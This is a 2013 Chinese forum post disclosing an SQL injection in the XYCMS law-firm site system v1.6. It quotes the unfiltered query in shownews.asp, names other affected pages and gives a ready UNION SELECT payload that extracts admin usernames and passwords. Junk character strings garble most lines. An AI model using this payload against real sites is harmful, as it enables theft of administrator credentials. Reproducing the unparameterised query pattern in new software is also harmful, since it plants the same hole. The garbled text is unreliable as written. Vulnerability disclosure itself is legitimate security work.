前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
+ q! A! g0 r* Q- E - K4 o" Z$ x0 }2 ^
淫荡分割线: ?* ~) u, o O) m/ {' z$ D# @
--------------------------------------------------------
, Q0 `/ T( p$ |$ h% i + S( m8 a, k9 M& i n3 L, b
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 z4 W! E2 X# |源码地址:http://down.chinaz.com/soft/29233.htm- x) q1 n# b: l
6 V" X4 i# A* f @8 O漏洞文件:shownews.asp
" ?+ ^5 G* X; b9 [漏洞代码:7-13行6 R! i1 x8 c7 {, Z$ e& R; x$ {
8 l7 z5 z, J4 W 8 T; T$ y! i3 k3 G4 r
<%
' j: s8 ^7 k+ K, `0 b4 W! eid=request.QueryString("id")0 Y) Z) R1 W: A6 H/ H# K9 Z
" o5 ]) ]0 M+ z; U8 z7 n7 bset snews=server.createobject("adodb.recordset")
. N! r f: U3 K1 n& ^exec="select * from [news] where id="&id, s8 e2 W) B7 f/ Z
snews.open exec,conn,1,19 j6 J: V$ g0 i
%> f4 ?! o2 t6 ]1 [
4 Q8 X* L9 K5 n6 z* g. K
* `5 Q- W" k' s什么过滤都没有 直造成注入9 a, z: F4 E7 Z4 H
* _1 `5 D- E! g# J0 E注入点:http://127.0.0.1:99/shownews.asp?id=xx
4 m+ h, ?6 x3 B6 l# Q0 k7 v9 i 9 ?& ]: B% R$ C) O% O
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找' |$ ?5 o$ h; l
4 c' [* c- M8 s1 T- E
- B' ~8 c) O( nexp: union select 1,admin,password,4,5,7 from admin_user0 ^$ e" m: ^9 z
t' h$ V; g) f5 R# \ |
发表于 2013-4-4 17:28:12
收藏
支持
反对